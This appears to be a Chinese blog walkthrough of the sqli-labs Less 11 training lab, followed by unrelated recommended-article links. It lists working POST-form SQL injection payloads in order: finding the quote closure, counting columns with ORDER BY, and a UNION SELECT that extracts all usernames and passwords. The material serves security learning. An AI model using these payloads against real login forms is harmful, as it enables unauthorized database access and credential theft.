sqli-labs靶场 less 11

文章目录


sqli-labs靶场

每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。

sql注入的基本步骤

  • 注入点
  • 注入类型
    • 字符型:判断闭合方式 ('、"、''、"")
    • 数字型
  • 根据实际情况,选择合适的注入方式
  • 获取数据库名,表名,列名,数据

less 11 POS联合注入

  • 题目类型:

细节:

Post输入框中,--+注释符不起作用,#注释符可以用

判断闭合方式

输入uname= a' 提示报错 ''1'' and password='' LIMIT 0,1'

根据报错得到,and连接用户名和密码

uname=1'--+ 没有提示报错,说明闭合成功,所以闭合方式是单引号

判断列数

uname=1'order+by+3--+

uname=1'order+by+2--+

无报错,说明该页面sql语句查询返回的字段数是二列

uname=1'union+select+1,2--+

联合注入报数据

uname=1'union+select+1,(select+substr((group_concat(username,password)),1,32)+from+users)--+

通过substr截取出全部数据

相关推荐
天蓝色的鱼鱼1 小时前
关于 CSS 你可能不知道的属性,但关键时刻很有用
前端·css
泯泷2 小时前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
妙码生花2 小时前
从 PHP 到 AI + Golang,程序员自救转型手记(十五):优化细节、网络请求封装
前端·后端·ai编程
泯泷2 小时前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
团团崽_七分甜2 小时前
Spring Boot 核心知识点总结
前端
lichenyang4532 小时前
从一个按钮开始,理解 ASCF 框架到底在做什么
前端
古夕3 小时前
第三方 SSO 接入实践:redirect_uri 编码、回调一致性与跨项目联调
前端·vue.js
朦胧之3 小时前
页面白屏卡住排查方法
前端·javascript
用户593608741403 小时前
Playwright 黑魔法:用 ClipboardEvent 绕过 React 富文本编辑器
前端
石山岭3 小时前
自己动手写了一个 Android 虚拟定位 App:GPSSimulate 技术实
android·前端